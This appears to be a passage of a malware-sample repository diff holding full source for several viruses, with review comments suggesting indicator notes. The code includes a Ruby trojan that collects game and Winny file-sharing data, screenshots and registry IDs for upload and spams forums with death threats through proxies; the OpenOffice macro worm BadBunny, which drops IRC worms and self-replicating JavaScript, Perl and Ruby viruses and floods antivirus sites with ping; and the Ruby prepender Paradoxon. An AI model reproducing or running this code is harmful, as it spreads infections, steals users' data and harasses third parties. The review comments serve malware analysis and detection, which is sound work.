if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0
File.copy(from + x, to + x)
end
end
end
}
rescue
return 1
end
0
end
def delete_dir(dir)
begin
Dir.foreach(dir){|x|
if !x.match(/^\.\.?/)
if File.directory?(dir + x)
if Dir.entries(dir + x).size <= 2
Dir.delete(dir + x)
else
delete_dir(dir + x + '/')
end
else
File.delete(dir + x)
end
end
}
Dir.delete(dir)
rescue
return 1
end
0
end
def roname
abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb
return nil if abx.size == 0
$charanames.push(abx) if !$charanames.include?(abx)
savedata($savefile)
abx
end
def emotion_wana wana
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key|
for i in 0..9
key.write_s(i.to_s, wana)
end
}
end
def upfolder(folder, trip)
Dir.mkdir(folder) if !File.exist?(folder)
begin
$nypath.each{|x|
File.chmod(0777, x + '/upfolder.txt')
open(x + '/UpFolder.txt', 'a+'){|f|
f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン')
}
}
rescue
end
folder
end
def saiki dir
sleep 0.01
begin
Dir.chdir(dir){
#print Dir.pwd + "\n"
$ropath.push Dir.pwd if File.exist?($tar[0])
$korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1])
sleep 0.01
$nypath.push Dir.pwd if File.exist?($tar[2])
$kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt')
$toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0
Dir.foreach('./'){ |x|
if File.directory?(x) && !x.match(/\.\.?/)
saiki(x)
end
}
}
rescue
p $!
ensure
end
end
def search
get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l')
for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('')
if get_drv_type.call(drive + ':/') == 3
saiki(drive + ':/')
end
end
$ropath.uniq!
$toolpath.uniq!
$korepath.uniq!
$nypath.uniq!
end
def savedata(path)
open(path, 'w'){|f|
Marshal.dump($ropath, f)
Marshal.dump($korepath, f)
Marshal.dump($nypath, f)
Marshal.dump($toolpath, f)
Marshal.dump($kakikomi, f)
Marshal.dump($bbs_arr, f)
Marshal.dump($charanames, f)
Marshal.dump($tekito_id, f)
}
true
end
def loaddata(path)
return false if !File.exists?(path)
open(path){|f|
$ropath = Marshal.load(f)
$korepath = Marshal.load(f)
$nypath = Marshal.load(f)
$toolpath = Marshal.load(f)
$kakikomi = Marshal.load(f)
$bbs_arr = Marshal.load(f)
$charanames = Marshal.load(f)
$tekito_id = Marshal.load(f)
}
true
end
def rns *str
if str.size == 1
str = str[0].split('')
end
str[rand(str.size)]
end
def names
begin
$charaarr = []
$charas = ''
separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words)
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list|
wisp_list.each_key{|server_str, sute|
$charas += server_str + "\n"
wisp_list.open(server_str){|server|
server.each_key{|char_str, sute|
$charaarr.push char_str.split("\0")[0]
}
}
$charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n"
$charaarr = []
}
}
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]}
rescue
p $1
end
end
names
$upup = upfolder('C:\program files\daemontools\\', '')
$capture = Proc.new{
loop do
getDC = Win32API.new('user32', 'GetDC', 'l', 'l')
releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l')
dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l')
dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i')
deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i')
begin
akakaka = roname
hdc = getDC.call(0)
hdib = dc2dib.call(hdc,0,0,0,0)
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' '+$charanames.join('')+'.png', hdib, 0)
File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0)
ensure
deleteDib.call(hdib)
releaceDC.call(0, hdc)
end
if akakaka
jikan = Time.now
if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18
emotion_wana "やあ僕BOTer#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!"
sleep 5 * 60
else
sleep 12 * 60
end
else
begin
open('c:/program files/internet explorer/iexplore.exe', 'a'){}
sleep 20 * 60
rescue
sleep 15 * 60
end
end
end
}
#init
$savefile = 'C:/RECYCLER/explorer.sys'
if !loaddata($savefile)
Thread.new(&$capture)
search
savedata($savefile)
else
Thread.new(&$capture)
end
if $tekito_id.size == 0
$tekito_id = $id
end
#p $ropath, $korepath, $nypath, $toolpath, $charanames
if Dir.glob('C:/program files/daemontools/*.zip').size == 0
begin
tmpf = 'C:/RECYCLER/tmp/'
Dir.mkdir(tmpf) if !File.exist?(tmpf)
$toolpath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'txt')
}
$korepath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'fld')
}
$ropath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld')
}
$nypath.each_with_index{|x, i|
if i == 0
to = tmpf + 'winny'
else
to = tmpf + 'winny' + i.to_s
end
Dir.mkdir(to) if !File.exist?(to)
File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt')
File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt')
File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt')
}
$kakikomi.each{|x|
File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x)
}
seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i')
str = 'aaaaa'
seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5)
rescue
p $!
print $!.backtrace.join("\n")
ensure
delete_dir tmpf
end
end
#exit
$path = $ropath[0] + '/'
$roaddr = File.exist?($path + 'roaddr.dll')
$ro = File.exist?($path + 'ragexe.exe')
$are = File.exist?($path + 'ws2_32.dll')
$rtx = File.exist?($path + 'ddraw.dll')
def rtx
rns(rns('rR'), rns('あアア') + rns('-あアア') + rns('るルル')) +
rns(rns('tT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー-')) +
rns(rns('xX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス'))
end
def aretool
rns(rns('aA'), rns('あアア')) +
rns(rns('rR') + rns('eE'), rns('れレレ')) +
rns(rns('tT') + rns('oO0'), rns('つツツ')) +
rns(rns('oO0'), rns('うウウー-')) +
rns(rns('lL'), rns('るルル'))
end
$nypath.each{|x|
if File.exist?(x + '/Tab1.txt')
open(x + '/Tab1.txt'){|f|
$omosiro_words = f.read.split("\n")
}
end
}
def getThreads
http = Web::Agent.new
http.setup
http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
$category, $bbs = *$bbs_arr[rand($bbs_arr.size)]
http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt")
$suret = http.rsp.body.split("\n")
sss = []
$suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
return sss;
end
#p '書き込み開始'
agent = Web::Agent.new
agent.setup
agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
agent.get('http://www.cybersyndrome.net/pla.html')
agent.rsp.body.match("")
proxy = []
while($'.match(/\"A\">([^<>]*)<\/a>/)) #'
proxy.push($~[1])
end
proxy.delete_if{|pr|
pr.match(/(80)|(8080)/)
}
proxy.collect! do |i|
i.split(':')
end
count = 0
while(1)
sure = getThreads;
if rand(6) == 0
for ituuu in 0..9
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.get 'http://yy14.kakiko.com/landstriker/subject.txt'
suret = age.rsp.body.split("\n")
sss = []
suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
Thread.new{
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.req.header['content-type']='application/x-www-form-urlencoded'
ran = rand(proxy.size)
if rand(2) == 1
age.proxy_host = proxy[ran][0]
age.proxy_port = proxy[ran][1]
end
if sss.size != 0
if $id == ''
age.req.form.add 'FROM', (10000 + rand(90000)).to_s
age.req.form.add 'mail', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
else
names
age.req.form.add 'FROM', $id
age.req.form.add 'mail', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'bbs', 'landstriker'
age.req.form.add 'key', sure[rand(sure.size)]
age.req.form.add 'time', Time.now.to_i.to_s
age.req.form.add 'submit', '書き込む'
age.post('http://yy14.kakiko.com/test.bbs.cgi')
else
suret[rand(suret.size)].match(/,(.+)\(/)
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'FROM', ''
age.req.form.add 'mail', ''
age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
age.req.form.add 'bbs', $bbs
age.req.form.add 'time', Time.now.to_s.toi
age.req.form.add 'submit', '新規スレッド作成'
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
}
end
else
if sure.size != 0
loop do
sleep $wait_time
r = rand proxy.size
Thread.new(r, proxy){|ran, pro|
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
if rand(2) == 1
age.proxy_host = pro[ran][0]
age.proxy_port = pro[ran][1]
end
if $id == ''
age.req.form.add 'NAME', (10000 + rand(90000)).to_s
age.req.form.add 'MAIL', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
else
names
age.req.form.add 'NAME', $id.chop.chop
age.req.form.add 'MAIL', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'BBS', $bbs
age.req.form.add 'KEY', sure[rand(sure.size)]
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
}
count += 1
break if count % 10 == 0
end
else
$suret[rand($suret.size)].match(/,(.+)\(/)
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'NAME', ''
age.req.form.add 'MAIL', ''
age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
age.req.form.add 'BBS', $bbs
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
end
end
while Thread.list.size > 2
sleep 10
end
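Review bot: This file arrives with no header at all, and its persistence and staging paths are scattered across several hundred lines, so a responder has to read the whole thing to learn what to look for. A comment block at the top should collect what the code itself shows: the copy to `C:/windows/system32/iexplore.exe`, the `Shell` value under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (written again in the `END` block), the three DLLs written into `system32`, the state file `C:/RECYCLER/explorer.sys`, the staging directory `C:/RECYCLER/tmp/`, and the output folder `C:\program files\daemontools\` that is appended to Winny's `UpFolder.txt`. It should also list the outbound HTTP destinations `jbbs.livedoor.jp`, `yy14.kakiko.com` and `www.cybersyndrome.net`, since those are the network-side indicators.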

314
Ruby/Virus.Ruby.Badbunny.a Normal file

@ -0,0 +1,314 @@
Dim Url As String
Dim myFileProp as Object
Sub badbunny()
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
mEventProps(0).Name = "EventType"
mEventProps(0).Value = "StarBasic"
mEventProps(1).Name = "Script"
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
oDocument = ThisComponent
otext=oDocument.text
ocursor=otext.createtextcursor()
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
call ping
end sub
sub startgame
if GetGUIType =1 then 'windows
call win
end if
if GetGUIType =3 then 'MacOS
call mac
end if
if GetGUIType =4 then 'linux
call lin
end if
end sub
sub win
Dim dirz As String
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="c:\badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
dirz=Environ ("programfiles")
Open "c:\drop.bad" For Output As #1
Print #1, "[script]"
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
Print #1, "n2=on 1:start:{"
Print #1, "n3= /if $day == Friday { /echo }"
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
Print #1, "n9=on 1:part:#:{"
Print #1, "n10=set %M_E $me"
Print #1, "n11=set %NickName $nick"
Print #1, "n12=set %ccd .dcc"
Print #1, "n13= if %NickName != %M_E {"
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
Print #1, "n15= /msg %NickName Be my bunny!"
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
Print #1, "n17= }"
Print #1, "n18=}"
Close #1
if ( Dir(dirz &"\mirc") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
end if
if ( Dir("c:\mirc") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
end if
if ( Dir(dirz &"\mirc32") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
end if
if ( Dir("c:\mirc32") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
end if
Open "c:\badbunny.js" For Output As #2
Print #2, "// BadBunny"
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
Print #2, "var OurCode=me.Read(1759)"
Print #2, "me.Close()"
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
Print #2, "{"
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
Print #2, "var Marker=filez.Read(11)"
Print #2, "var allinone=Marker+filez.ReadAll()"
Print #2, "filez.Close()"
Print #2, "if(Marker!=""// BadBunny"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
Print #2, "filez.Write(OurCode+allinone)"
Print #2, "filez.Close()"
Print #2, "}"
Print #2, "}"
Print #2, "}"
Print #2, "function foundit()"
Print #2, "{"
Print #2, "fcodea=''; count=0; randon='';"
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
Print #2, "i+=fcodea.length;"
Print #2, "}"
Print #2, "//->"
Close #2
Shell("c:\badbunny.js",0)
oDoc.store()
End Sub
sub lin()
'xchat2worm part by WarGame
dim HomeDir as string
dim xchat2script as string
dim perlvir as string
dim cmd as string
dim WgeT as string
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="/tmp/badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
' get home dir
HomeDir = Environ("HOME")
'build the path of our xchat2 script
if HomeDir = "" then
' I could not get $HOME !
else
xchat2script = HomeDir & "/.xchat2/badbunny.py"
' drop the python script
Open xchat2script For Output As #1
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
print #1,"import xchat"
print #1,"def onkick_cb(word, word_eol, userdata):"
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
print #1," return xchat.EAT_NONE"
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
close #1
endif
'drop the perl virus
perlvir = HomeDir & "/BadBunny.pl"
open perlvir for output as #1
print #1,"#BadBunny"
print #1,"open(File,$0);@MyCode = ;close(File);"
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
close #1
cmd = "perl " & perlvir
shell(cmd,0)
oDoc.store()
end sub
sub mac()
Dim iVar As Integer
iVar = Int((15 * Rnd) -2)
Select Case iVar
Case 1 To 5
call one
Case 6, 7, 8
call two
Case Is > 8 And iVar < 11
call one
Case Else
call two
End Select
end sub
sub one ()
'thx to skyout
Open "badbunny.rb" For Output As #1
print #1,"#!/usr/bin/env ruby"
print #1,"require 'ftools'"
print #1,"def replacecmd(cmdname, dirpath)"
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
print #1,"oldcmd.puts ""puts \""\"""""
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""3\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""2\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""1\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""for $args in $* do"""
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
print #1,"oldcmd.puts ""end"""
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
print #1,"oldcmd.puts ""exit 0"""
print #1,"end"
print #1,"$binary_dirs = Array.new"
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
print #1,"for $dir in $binary_dirs do"
print #1,"if File.directory?($dir) then"
print #1,"if File.writable?($dir) then"
print #1,"Dir.open($dir).each do |file|"
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
print #1,"replacecmd(file, $dir)"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"exit 0"
close #1
Shell("badbunny.rb",0)
end sub
sub two() 'thx to SPTH for this...
Open "badbunnya.rb" For Output As #2
print #2,"# BADB"
print #2,"mycode="""
print #2,"mych=File.open(__FILE__)"
print #2,"myc=mych.read(1)"
print #2,"while myc!=nil"
print #2,"mycode+=myc"
print #2,"myc=mych.read(1)"
print #2,"end"
print #2,"mycode=mycode[mycode.length-734,734]"
print #2,"cdir = Dir.open(Dir.getwd)"
print #2,"cdir.each do |a|"
print #2,"if File.ftype(a)==""file"" then"
print #2,"if a[a.length-3, a.length]=="".rb"" then"
print #2,"if a!=File.basename(__FILE__) then"
print #2,"fcode="""
print #2,"fle=open(a)"
print #2,"badb=fle.read(1)"
print #2,"while badb!=nil"
print #2,"fcode+=badb"
print #2,"badb=fle.read(1)"
print #2,"end"
print #2,"fle.close"
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
print #2,"fcode=fcode+13.chr+10.chr+mycode"
print #2,"fle=open(a,""w"")"
print #2,"fle.print fcode"
print #2,"fle.close"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"cdir.close"
close #2
Shell("badbunnya.rb",0)
End Sub
sub ping()
Shell("ping -l 5000 -t www.ikarus.at",0)
Shell("ping -l 5000 -t www.aladdin.com",0)
Shell("ping -l 5000 -t www.norman.no",0)
Shell("ping -l 5000 -t www.norman.com",0)
Shell("ping -l 5000 -t www.kaspersky.com",0)
Shell("ping -l 5000 -t www.kaspersky.ru",0)
Shell("ping -l 5000 -t www.kaspersky.pl",0)
Shell("ping -l 5000 -t www.grisoft.cz",0)
Shell("ping -l 5000 -t www.symantec.com",0)
Shell("ping -l 5000 -t www.proantivirus.com",0)
Shell("ping -l 5000 -t www.f-secure.com",0)
Shell("ping -l 5000 -t www.sophos.com",0)
Shell("ping -l 5000 -t www.arcabit.pl",0)
Shell("ping -l 5000 -t www.arcabit.com",0)
Shell("ping -l 5000 -t www.avira.com",0)
Shell("ping -l 5000 -t www.avira.de",0)
Shell("ping -l 5000 -t www.avira.ro",0)
Shell("ping -l 5000 -t www.avast.com",0)
Shell("ping -l 5000 -t www.virusbuster.hu",0)
Shell("ping -l 5000 -t www.trendmicro.com",0)
Shell("ping -l 5000 -t www.bitdefender.com",0)
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
Shell("ping -l 5000 -t www.drweb.com",0)
Shell("ping -l 5000 -t www.drweb.ru",0)
Shell("ping -l 5000 -t www.viruslist.com",0)
end sub
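Review bot: The section is filed under `Ruby/` with no analyst note, but the added text is a StarBasic (OpenOffice) macro, `Sub badbunny()` through `sub ping()`, which only writes Ruby from `sub one` and `sub two`; an accompanying note should say so and list the artifacts it leaves, kept outside the sample so its bytes stay unchanged. Suggested text: `StarBasic macro worm, not Ruby; drops c:\drop.bad, c:\badbunny.js, c:\badbunny.odg, /tmp/badbunny.odg, ~/.xchat2/badbunny.py, ~/BadBunny.pl, badbunny.rb, badbunnya.rb`. `sub win` also copies `c:\drop.bad` over `script.ini` in four mIRC directories, and `sub ping` starts 25 `ping -l 5000 -t` processes from the office application; both are usable host-side detections. The section shows 296 lines against the 314 in its header, and the two Perl `print` lines in `sub lin` look truncated, so this listing is probably not byte-identical to the original sample and should not be hashed as such.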

26
Ruby/Virus.Ruby.Pydoxon.b Normal file

@ -0,0 +1,26 @@
# RUBY.Paradoxon
mycode=File.open(__FILE__).read(630)
cdir = Dir.open(Dir.getwd)
cdir.each do |a|
if File.ftype(a)=="file" then
if a[a.length-3, a.length]==".rb" then
if a!=File.basename(__FILE__) then
fcode=""
fle=open(a)
spth=fle.read(1)
while spth!=nil
fcode+=spth
spth=fle.read(1)
end
fle.close
if fcode[7,9]!="Paradoxon" then
fcode=mycode+13.chr+10.chr+fcode
fle=open(a,"w")
fle.print fcode
fle.close
end
end
end
end
end
cdir.close
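Review bot: The sample has no description of its behaviour or of how to recognise an infected file, and its first line reads `# RUBY.Paradoxon` while the path says `Pydoxon.b`; both belong in an accompanying note, kept outside the sample so its bytes stay unchanged. From the visible lines it reads the first 630 bytes of itself and prepends them plus CR LF to every other `.rb` file in the working directory unless `fcode[7,9]` already equals `Paradoxon`. An infected file is therefore recognisable by `# RUBY.Paradoxon` as its first line. Suggested text: `Virus.Ruby.Pydoxon.b: prepender, 630-byte body; marker "Paradoxon" at byte offset 7 of each infected .rb file`.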